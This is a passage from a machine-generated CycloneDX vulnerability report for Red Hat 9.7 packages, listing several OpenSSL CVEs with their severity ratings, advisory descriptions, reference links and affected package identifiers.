"urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-28386", "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 125 ], "description": "Issue summary: Applications using AES-CFB128 encryption or decryption on\nsystems with AVX-512 and VAES support can trigger an out-of-bounds read\nof up to 15 bytes when processing partial cipher blocks.\n\nImpact summary: This out-of-bounds read may trigger a crash which leads to\nDenial of Service for an application if the input buffer ends at a memory\npage boundary and the following page is unmapped. There is no information\ndisclosure as the over-read bytes are not written to output.\n\nThe vulnerable code path is only reached when processing partial blocks\n(when a previous call left an incomplete block and the current call provides\nfewer bytes than needed to complete it). Additionally, the input buffer\nmust be positioned at a page boundary with the following page unmapped.\nCFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or\nChaCha20-Poly1305 instead. For these reasons the issue was assessed as\nLow severity according to our Security Policy.\n\nOnly x86-64 systems with AVX-512 and VAES instruction support are affected.\nOther architectures and systems without VAES support use different code\npaths that are not affected.\n\nOpenSSL FIPS module in 3.6 version is affected by this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-28386" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-28386" }, { "url": "https://github.com/openssl/openssl/commit/61f428a2fc6671ede184a19f71e6e495f0689621" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28386" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-28386" } ], "published": "2026-04-07T22:16:20+00:00", "updated": "2026-04-24T18:28:21+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-28387", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "nvd" }, "score": 8.1, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 416 ], "description": "Issue summary: An uncommon configuration of clients performing DANE TLSA-based\nserver authentication, when paired with uncommon server DANE TLSA records, may\nresult in a use-after-free and/or double-free on the client side.\n\nImpact summary: A use after free can have a range of potential consequences\nsuch as the corruption of valid data, crashes or execution of arbitrary code.\n\nHowever, the issue only affects clients that make use of TLSA records with both\nthe PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate\nusage.\n\nBy far the most common deployment of DANE is in SMTP MTAs for which RFC7672\nrecommends that clients treat as 'unusable' any TLSA records that have the PKIX\ncertificate usages. These SMTP (or other similar) clients are not vulnerable\nto this issue. Conversely, any clients that support only the PKIX usages, and\nignore the DANE-TA(2) usage are also not vulnerable.\n\nThe client would also need to be communicating with a server that publishes a\nTLSA RRset with both types of TLSA records.\n\nNo FIPS modules are affected by this issue, the problem code is outside the\nFIPS module boundary.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-28387" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-28387" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html" }, { "url": "https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b" }, { "url": "https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe" }, { "url": "https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3" }, { "url": "https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7" }, { "url": "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28387" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://ubuntu.com/security/notices/USN-8155-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-28387" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11" } ], "published": "2026-04-07T22:16:20+00:00", "updated": "2026-05-12T13:17:33+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-28388", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 476 ], "description": "Issue summary: When a delta CRL that contains a Delta CRL Indicator extension\nis processed a NULL pointer dereference might happen if the required CRL\nNumber extension is missing.\n\nImpact summary: A NULL pointer dereference can trigger a crash which\nleads to a Denial of Service for an application.\n\nWhen CRL processing and delta CRL processing is enabled during X.509\ncertificate verification, the delta CRL processing does not check\nwhether the CRL Number extension is NULL before dereferencing it.\nWhen a malformed delta CRL file is being processed, this parameter\ncan be NULL, causing a NULL pointer dereference.\n\nExploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in\nthe verification context, the certificate being verified to contain a\nfreshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and\nan attacker to provide a malformed CRL to an application that processes it.\n\nThe vulnerability is limited to Denial of Service and cannot be escalated to\nachieve code execution or memory disclosure. For that reason the issue was\nassessed as Low severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-28388" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-28388" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html" }, { "url": "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e" }, { "url": "https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139" }, { "url": "https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3" }, { "url": "https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8" }, { "url": "https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28388" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://ubuntu.com/security/notices/USN-8155-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-28388" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11" } ], "published": "2026-04-07T22:16:20+00:00", "updated": "2026-05-12T13:17:33+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-28389", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 476 ], "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyAgreeRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is\nprocessed, the optional parameters field of KeyEncryptionAlgorithmIdentifier\nis examined without checking for its presence. This results in a NULL\npointer dereference if the field is missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-28389" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-28389" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html" }, { "url": "https://github.com/advisories/GHSA-7x88-9hgc-69gf" }, { "url": "https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5" }, { "url": "https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616" }, { "url": "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f" }, { "url": "https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a" }, { "url": "https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28389" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://ubuntu.com/security/notices/USN-8155-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-28389" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11" } ], "published": "2026-04-07T22:16:21+00:00", "updated": "2026-05-12T13:17:33+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-28390", 